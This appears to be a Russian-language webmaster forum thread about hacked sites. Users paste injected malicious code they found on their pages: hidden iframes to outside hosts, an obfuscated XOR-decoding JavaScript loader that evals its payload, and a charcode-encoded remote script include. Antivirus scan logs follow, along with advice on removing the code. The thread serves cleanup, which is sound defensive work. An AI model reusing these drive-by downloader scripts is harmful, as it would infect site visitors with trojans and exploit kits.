Пришлите адрес в ЛС, пожалуйста.адрес левого сайта
<iframe src='http://localsite.****/doc/go.php?sid=1' style='display:none;'></iframe>
http://abs****andit.com//index.php?
;document.write("<"+"i"+"f"+"rame"+" sr"+"c='http://localsite.spb.ru/doc/go.php?sid=1'"+" style='d"+"isplay:no"+"ne;
'></"+"i"+"f"+"rame>");
<script language="javascript" type="text/javascript">var popAt;popAt='%85%84%86%82%82%87%83%83%f0%8f%92%91%89%89%9c%96%d9%d8%9b%9d%fc%83%88%93%d6%88%be%87%b9%88%8e%a3%93%83%ff%a1%92%8f%96%82%a5%8d%99%e5%e9%88%97%91%9a%98%92%ac%d4%ff%d0%9c%91%a4%99%8a%bf%85%85%c5%a9%d4%97%92%90%b5%8f%94%94%de%b8%83%c3%9f%89%99%ad%81%89%97%98%96%83%85%8b%b0%be%ba%c5%cf%8c%9b%81%85***%da%ca%dd%de%91%95%d7%82%8b%be%ba%94%b6%95%a4%98%92%cc%bb%81%bd%bd%82%86%a3%84%95%f4%c9%b3%93%84%8e%ab%85%83%f2%84%9e%89%ae%98%b1%cc%90%e9%c5%cb%95%cd%99%c9%94%83%bf%9a%83%94%84%d6%95%9b%df%b2%85%cb';function codeNs(rarBedAwk){function outAt(bestNetNs){var logAwk=0;var zorgBgPip=bestNetNs.length, argVipOp=0;while(argVipOp<zorgBgPip){logAwk+=outMov(bestNetNs,argVipOp)*zorgBgPip;argVipOp++;}return (logAwk+'');}function outMov(nilNet,memWait){return nilNet['c?h?ayrGCGo?d?e?A@ty'.replace(/[y@Z\?G]/g, '')](memWait);}if((new String(document.write)).indexOf('arity')>0){return;}var bcArgOp=0,imgPico=0,manArcZip=179;var cdPop='';var useModMax=(new String(codeNs)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var nanoCallAwk=outAt(useModMax);rarBedAwk=window['u%n%e/s/cDaEp%e%'.replace(/[%/lED]/g, '')](rarBedAwk);for(var midFcCal=0; midFcCal < (rarBedAwk.length); midFcCal++){var orgIn=outMov(useModMax,bcArgOp);var netArc=outMov(nanoCallAwk,imgPico);var exitGet=orgIn^netArc^manArcZip;var popBc=outMov(rarBedAwk,midFcCal);bcArgOp++,imgPico++;cdPop+=String['f~r+olm+ClhwaAr+C+o+d~e~'.replace(/[\+l~wA]/g, '')](popBc^exitGet);if(imgPico>nanoCallAwk.length)imgPico=0;if(bcArgOp>useModMax.length)bcArgOp=0;}window['eNvNa2lN'.replace(/[iDNq2]/g, '')](cdPop);return cdPop=new String();}codeNs(popAt);</script><iframe style="height: 0pt; width: 0pt; outline: medium none;" name="cpPkg" src="http://62wheel.info/t/" frameborder="0"></iframe>
Вечером проверю более внимательно.
Сайт заражен:
Trojan-Downloader.JS.Agent.fer
И пытается загрузить
Exploit.JS.Pdfka.bz
Добавлено через 12 минут 19 секунд
Уберите в конце листа код:
PHP:<script language="javascript" type="text/javascript">var popAt;popAt='%85%84%86%82%82%87%83%83%f0%8f%92%91%89%89%9c%96%d9%d8%9b%9d%fc%83%88%93%d6%88%be%87%b9%88%8e%a3%93%83%ff%a1%92%8f%96%82%a5%8d%99%e5%e9%88%97%91%9a%98%92%ac%d4%ff%d0%9c%91%a4%99%8a%bf%85%85%c5%a9%d4%97%92%90%b5%8f%94%94%de%b8%83%c3%9f%89%99%ad%81%89%97%98%96%83%85%8b%b0%be%ba%c5%cf%8c%9b%81%85***%da%ca%dd%de%91%95%d7%82%8b%be%ba%94%b6%95%a4%98%92%cc%bb%81%bd%bd%82%86%a3%84%95%f4%c9%b3%93%84%8e%ab%85%83%f2%84%9e%89%ae%98%b1%cc%90%e9%c5%cb%95%cd%99%c9%94%83%bf%9a%83%94%84%d6%95%9b%df%b2%85%cb';function codeNs(rarBedAwk){function outAt(bestNetNs){var logAwk=0;var zorgBgPip=bestNetNs.length, argVipOp=0;while(argVipOp<zorgBgPip){logAwk+=outMov(bestNetNs,argVipOp)*zorgBgPip;argVipOp++;}return (logAwk+'');}function outMov(nilNet,memWait){return nilNet['c?h?ayrGCGo?d?e?A@ty'.replace(/[y@Z\?G]/g, '')](memWait);}if((new String(document.write)).indexOf('arity')>0){return;}var bcArgOp=0,imgPico=0,manArcZip=179;var cdPop='';var useModMax=(new String(codeNs)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var nanoCallAwk=outAt(useModMax);rarBedAwk=window['u%n%e/s/cDaEp%e%'.replace(/[%/lED]/g, '')](rarBedAwk);for(var midFcCal=0; midFcCal < (rarBedAwk.length); midFcCal++){var orgIn=outMov(useModMax,bcArgOp);var netArc=outMov(nanoCallAwk,imgPico);var exitGet=orgIn^netArc^manArcZip;var popBc=outMov(rarBedAwk,midFcCal);bcArgOp++,imgPico++;cdPop+=String['f~r+olm+ClhwaAr+C+o+d~e~'.replace(/[\+l~wA]/g, '')](popBc^exitGet);if(imgPico>nanoCallAwk.length)imgPico=0;if(bcArgOp>useModMax.length)bcArgOp=0;}window['eNvNa2lN'.replace(/[iDNq2]/g, '')](cdPop);return cdPop=new String();}codeNs(popAt);</script><iframe style="height: 0pt; width: 0pt; outline: medium none;" name="cpPkg" src="http://62wheel.info/t/" frameborder="0"></iframe>
10.05.2010 13:56:00 http://molodezh.kiev.ua/favicon.ico|>{gzip} [L] HTML:Script-inf (0)
10.05.2010 13:56:14 http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:57:36 http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:58:36 http://molodezh.kiev.ua/forum/index.php?showtopic=16205&st=0&p=98295&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:59:36 http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 14:46:51 http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98474&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
*
* Звіт про сканування Екраном реального часу avast!
* Цей файл згенеровано автоматично
*
* Почато: 10 Травень 2010 р. 21:28:02
*
*
* Звіт про сканування Екраном реального часу avast!
* Цей файл згенеровано автоматично
*
* Почато: 10 Травень 2010 р. 22:45:04
*
10.05.2010 23:00:02 http://molodezh.kiev.ua/favicon.ico|>{gzip} [L] HTML:Script-inf (0)
10.05.2010 23:00:24 http://molodezh.kiev.ua/forum/index.php?showtopic=15298&pid=98481&st=0&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 23:00:27 http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98478&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
<script type="text/javascript" language="javascript">
<!--
docu*****rite("<scr"+"ipt type='text/javascript' language='javasc"+"ript' src='");
function Sr187(uL443){document.write( String.fromCharCode(parseInt(uL443)-3));}
var y602="107h119h119h115h61h50h50h103h104h112h108h"+
"100h113h1*********4h102h107h"+
"110h100h49h113h104h119h50h115h71h93h92h104h90h53h51h"+
"59h57h50h66h118h108h103h64h57h55h52h55";var Dw663=y602.split("h");
for(y*************ength;yF436++){Sr187(Dw663[yF436]);}
document.write("'></sc"+"ript>");
// -->
</script>
<script type='text/javascript' language='javascript' src='[хттп://demia***.okoshechka.net/pDZYeW2086/?sid=6414'></script>
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?